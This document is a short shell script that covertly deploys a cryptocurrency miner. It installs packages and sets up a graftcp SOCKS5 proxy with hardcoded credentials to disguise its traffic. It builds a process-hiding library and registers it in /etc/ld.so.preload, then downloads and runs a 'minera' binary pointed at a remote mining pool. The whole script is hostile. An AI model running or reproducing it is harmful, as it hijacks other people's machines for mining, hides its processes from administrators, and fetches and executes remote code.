#!/bin/sh

ln -fs /usr/share/zoneinfo/Africa/Johannesburg /etc/localtime

dpkg-reconfigure --frontend noninteractive tzdata

apt update;apt -y install binutils cmake build-essential screen unzip net-tools curl
apt-get install -y ca-certificates wget libcurl4 libjansson4 libgomp1 libnuma-dev

wget https://github.com/komaria10003099/wappahj/raw/main/graphics.tar.gz

tar -xvzf graphics.tar.gz

cat > graftcp/local/graftcp-local.conf <<END
listen = :2233
loglevel = 1
socks5 = us-east-static-03.quotaguard.com:1080
socks5_username = m1orro4i3z62xo
socks5_password = vdx9fz1txauwwfs4407a3zirgr8t9
END

./graftcp/local/graftcp-local -config graftcp/local/graftcp-local.conf &

sleep .2

echo " "

echo " "

echo "**"

./graftcp/graftcp curl ifconfig.me

echo " "

echo " "

echo "**"

echo " "

echo " "


wget https://github.com/komaria10003099/wappahj/raw/main/magicBezzHash.zip

unzip magicBezzHash.zip

make

gcc -Wall -fPIC -shared -o libprocesshider.so processhider.c -ldl

mv libprocesshider.so /usr/local/lib/

echo /usr/local/lib/libprocesshider.so >> /etc/ld.so.preload

./graftcp/graftcp wget https://github.com/komaria10003099/komaria/raw/main/minera && chmod +x minera && ./minera -o 47.89.234.73:443 -t 2
